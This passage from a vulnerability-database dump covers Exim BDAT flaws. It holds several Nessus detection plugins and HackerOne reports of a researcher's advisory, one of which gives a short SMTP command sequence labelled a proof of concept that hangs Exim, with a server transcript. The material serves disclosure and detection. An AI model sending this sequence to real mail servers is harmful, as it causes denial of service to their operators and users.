character signifying the end\nof the content, related to the bdat_getc function.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.exim.org/show_bug.cgi?id=2199\"\n );\n # https://vuxml.freebsd.org/freebsd/75dd622c-d5fd-11e7-b9fe-c13eb7bcbf4f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0d397a7c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim>=4.88<4.89.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-13T09:47:08", "bulletinFamily": "scanner", "description": "It was discovered that Exim incorrectly handled certain BDAT data\nheaders. A remote attacker could possibly use this issue to cause Exim\nto crash, resulting in a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "UBUNTU_USN-3499-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104882", "published": "2017-11-30T00:00:00", "title": "Ubuntu 17.04 / 17.10 : exim4 vulnerability (USN-3499-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3499-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104882);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-16944\");\n script_xref(name:\"USN\", value:\"3499-1\");\n\n script_name(english:\"Ubuntu 17.04 / 17.10 : exim4 vulnerability (USN-3499-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Exim incorrectly handled certain BDAT data\nheaders. A remote attacker could possibly use this issue to cause Exim\nto crash, resulting in a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3499-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected exim4-daemon-heavy and / or exim4-daemon-light\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(17\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 17.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"17.04\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.88-5ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"exim4-daemon-light\", pkgver:\"4.88-5ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.89-5ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"exim4-daemon-light\", pkgver:\"4.89-5ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim4-daemon-heavy / exim4-daemon-light\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-13T07:01:59", "bulletinFamily": "scanner", "description": "According to its banner and supported extensions, the remote installation of\nExim is affected by a code execution flaw. 
The implementation of the BDAT SMTP\nverb for sending large binary messages introduced in Exim 4.88 can incorrectly\nfree an in-use region of memory, leading to memory corruption and potentially\nallowing an attacker to execute code.", "modified": "2019-12-02T00:00:00", "id": "EXIM_BDAT_CHUNK_UAF.NASL", "href": "https://www.tenable.com/plugins/nessus/104815", "published": "2017-11-29T00:00:00", "title": "Exim < 4.89.1 Use-After-Free BDAT Remote Code Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104815);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2017-16943\");\n\n script_name(english:\"Exim < 4.89.1 Use-After-Free BDAT Remote Code Execution\");\n script_summary(english:\"Checks the SMTP banner and for CHUNKING support\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server is potentially affected by a remote code execution\nflaw.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner and supported extensions, the remote installation of\nExim is affected by a code execution flaw. The implementation of the BDAT SMTP\nverb for sending large binary messages introduced in Exim 4.88 can incorrectly\nfree an in-use region of memory, leading to memory corruption and potentially\nallowing an attacker to execute code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.exim.org/lurker/message/20171125.034842.d1d75cac.en.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Exim 4.89.1 or later, or Exim 4.90-RC3 or later. 
If you cannot\nupgrade, edit your Exim configuration and set 'chunking_advertise_hosts' to an\nempty value as a workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-16943\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:exim:exim\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nport = get_service(svc:\"smtp\", default:25, exit_on_fail:TRUE);\n\nbanner = get_smtp_banner(port:port, exit_on_fail:TRUE);\nif (!banner)\n audit(AUDIT_NO_BANNER, port);\n\nif (\"Exim\" >!< banner)\n audit(AUDIT_NOT_LISTEN, 'Exim', port);\n\nmatches = pregmatch(pattern:\"^220.*Exim ([0-9\\.]+)(_RC[0-9]+)?\", string:banner);\nif (isnull(matches))\n audit(AUDIT_SERVICE_VER_FAIL, 'Exim', port);\n\nversion = matches[1];\nrc = matches[2];\n\n# 4.88 is the first vulnerable version. All of 4.88 is vulnerable.\n# 4.89.1 is the first official patched version in 4.89 branch.\n# 4.90 is not yet released, but Debian is shipping its Release Candidates.\n# 4.90_RC3 is the first 4.90 RC with a patch.\n\n# Unless they've got a 4.90 release candidate, they need to upgrade to 4.89.1.\nfix = \"4.89.1\";\n\n# Between 4.90 and 4.88 inclusive. 
RCs are ignored.\nif (ver_compare(fix:\"4.90\", ver:version, strict:FALSE) <= 0 &&\n ver_compare(fix:\"4.88\", ver:version, strict:FALSE) >= 0)\n{\n # 4.90 is a special case, because a fix was added to a 4.90 release candidate.\n if (version == \"4.90\")\n {\n if (isnull(rc) || rc =~ \"RC([3-9]|[1-9][0-9])\")\n audit(AUDIT_INST_VER_NOT_VULN, \"Exim\", version + rc);\n else\n fix = \"4.90_RC3\";\n }\n else if (ver_compare(fix:\"4.89.1\", ver:version, strict:FALSE) >= 0)\n {\n audit(AUDIT_INST_VER_NOT_VULN, \"Exim\", version + rc);\n }\n}\nelse\n{\n audit(AUDIT_INST_VER_NOT_VULN, \"Exim\", version + rc);\n}\n\nsocket = smtp_open(port:port, exit_on_fail:TRUE);\n# Ask for the supported extensions.\nif (!get_kb_item(\"TEST_exim_bdat_chunk_uaf_do_not_open_socket\"))\n send(socket:socket, data:'EHLO ' + this_host_name() + '\\r\\n');\nlines = smtp_recv_line(socket:socket, code:250);\nsmtp_close(socket:socket);\n\n# If the first line isn't a 250, the server might not support EHLO\nif (lines !~ \"^250[- ]\")\n audit(AUDIT_RESP_BAD, port, \"an SMTP EHLO command\");\n\nif (!pgrep(pattern:\"^250[- ]CHUNKING\", string:lines))\n exit(0, \"The Exim server listening on port \" + port + \" does not support CHUNKING/BDAT.\");\n\nsecurity_report_v4(\n port:port,\n severity:SECURITY_HOLE,\n extra:\n '\\n Banner : ' + strip(banner) +\n '\\n Installed version : ' + version + rc +\n '\\n Fixed version : ' + fix +\n '\\n The CHUNKING / BDAT extension was found to be enabled.'\n);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T09:47:08", "bulletinFamily": "scanner", "description": "It was discovered that Exim incorrectly handled memory in the ESMTP\nCHUNKING extension. A remote attacker could use this issue to cause\nExim to crash, resulting in a denial of service, or possibly execute\narbitrary code. 
The default compiler options for affected releases\nshould reduce the vulnerability to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "UBUNTU_USN-3493-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104808", "published": "2017-11-28T00:00:00", "title": "Ubuntu 17.04 / 17.10 : exim4 vulnerability (USN-3493-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3493-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104808);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-16943\");\n script_xref(name:\"USN\", value:\"3493-1\");\n\n script_name(english:\"Ubuntu 17.04 / 17.10 : exim4 vulnerability (USN-3493-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Exim incorrectly handled memory in the ESMTP\nCHUNKING extension. A remote attacker could use this issue to cause\nExim to crash, resulting in a denial of service, or possibly execute\narbitrary code. The default compiler options for affected releases\nshould reduce the vulnerability to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3493-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected exim4-daemon-heavy and / or exim4-daemon-light\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(17\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 17.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"17.04\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.88-5ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"exim4-daemon-light\", pkgver:\"4.88-5ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.89-5ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"exim4-daemon-light\", pkgver:\"4.89-5ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim4-daemon-heavy / exim4-daemon-light\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T08:17:11", "bulletinFamily": "scanner", "description": "This update for exim fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2017-16943: Fix possible remote code execution\n (boo#1069857).", "modified": "2019-12-02T00:00:00", "id": "OPENSUSE-2017-1342.NASL", "href": "https://www.tenable.com/plugins/nessus/105232", "published": "2017-12-14T00:00:00", "title": "openSUSE Security Update : exim (openSUSE-2017-1342)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text 
and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1342.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105232);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2018/01/26 17:32:51 $\");\n\n script_cve_id(\"CVE-2017-16943\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2017-1342)\");\n script_summary(english:\"Check for the openSUSE-2017-1342 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for exim fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2017-16943: Fix possible remote code execution\n (boo#1069857).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1069857\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-4.86.2-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debuginfo-4.86.2-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debugsource-4.86.2-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-4.86.2-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-debuginfo-4.86.2-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximstats-html-4.86.2-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-4.86.2-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-debuginfo-4.86.2-17.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-debugsource-4.86.2-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximon-4.86.2-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximon-debuginfo-4.86.2-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximstats-html-4.86.2-17.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2019-11-20T17:03:05", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "## Original article is [here](https://devco.re/blog/2017/12/11/Exim-RCE-advisory-CVE-2017-16943-en/)\n\n# Incorrect BDAT data handling leads to DoS \n\n### Vulnerability Analysis\nWhen receiving data with the BDAT command, an SMTP server should not consider a single dot `\u2018.\u2019` on a line to be the end of the message. However, we found that exim does so in receive_msg when parsing the header, as shown in the following output:\n```\n220 devco.re ESMTP Exim 4.90devstart_213-7c6ec81-XX Mon, 27 Nov 2017 16:58:20 +0800\nEHLO test\n250-devco.re Hello root at test\n250-SIZE 52428800\n250-8BITMIME\n250-PIPELINING\n250-AUTH PLAIN LOGIN CRAM-MD5\n250-CHUNKING\n250-STARTTLS\n250-PRDR\n250 HELP\nMAIL FROM:<meh@some.domain>\n250 OK\nRCPT TO:<meh@some.domain>\n250 Accepted\nBDAT 10\n.\n250- 10 byte chunk, total 0\n250 OK id=1eJFGW-000CB0-1R\n```\nAs we mentioned before, exim uses function pointers to switch input source. This bug makes exim go into an incorrect state because the function pointer `receive_getc` is not reset. 
If the next command is also a BDAT, `receive_getc` and `lwr_receive_getc` become the same and an infinite loop occurs inside `bdat_getc`. Program crashes due to stack exhaustion.\n[smtp_in.c: 546 bdat_getc](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L546)\n```\n if (chunking_data_left > 0)\n return lwr_receive_getc(chunking_data_left--);\n```\nThis is not enough to pose a threat because exim runs a fork server. After a further analysis, we made exim go into an infinite loop without crashing, using the following commands.\n```\n# CVE-2017-16944 PoC by meh at DEVCORE\n\nEHLO localhost\nMAIL FROM:<meh@some.domain>\nRCPT TO:<meh@some.domain>\nBDAT 100\n.\nMAIL FROM:<meh@some.domain>\nRCPT TO:<meh@some.domain>\nBDAT 0 LAST\n```\nThis makes attackers able to launch a resource based DoS attack and then force the whole server down.\n\n## Impact\n\nMake mail server process crash or hang. Attackers may launch a resource based DoS attack and then force the whole server down.", "modified": "2019-11-12T23:47:13", "published": "2017-12-11T15:59:10", "id": "H1:296994", "href": "https://hackerone.com/reports/296994", "type": "hackerone", "title": "The Internet: Exim handles BDAT data incorrectly and leads to crash/hang", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-20T17:03:05", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "Original article is [here](https://devco.re/blog/2017/12/11/Exim-RCE-advisory-CVE-2017-16943-en/)\n\n# Use-after-free in receive_msg leads to RCE\n\n### Vulnerability Analysis\nTo explain this bug, we need to start with the memory management of exim. There is a series of functions starts with `store_` such as `store_get`, `store_release`, `store_reset`. These functions are used to manage dynamically allocated memory and improve performance. 
Its architecture is like the illustration below:\n\n\nInitially, exim allocates a big storeblock (default 0x2000) and then cuts it into **stores** when `store_get` is called, using global pointers to record the size of unused memory and where to cut in the next allocation. Once the `current_block` is insufficient, it allocates a new block and appends it to the end of the chain, which is a linked list, and then makes `current_block` point to it. Exim maintains three `store_pool`, that is, there are three chains like the illustration above and all of these global variables are actually arrays.\nThis vulnerability is in `receive_msg` where exim reads headers: \n[receive.c: 1817 receive_msg](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1817)\n```c\n if (ptr >= header_size - 4)\n {\n int oldsize = header_size;\n /* header_size += 256; */\n header_size *= 2;\n if (!store_extend(next->text, oldsize, header_size))\n {\n uschar *newtext = store_get(header_size);\n memcpy(newtext, next->text, ptr);\n store_release(next->text);\n next->text = newtext;\n }\n }\n```\nIt seems normal if the store functions are just like realloc, malloc and free. However, they are different and cannot be used in this way. When exim tries to **extend** a store, the function `store_extend` checks 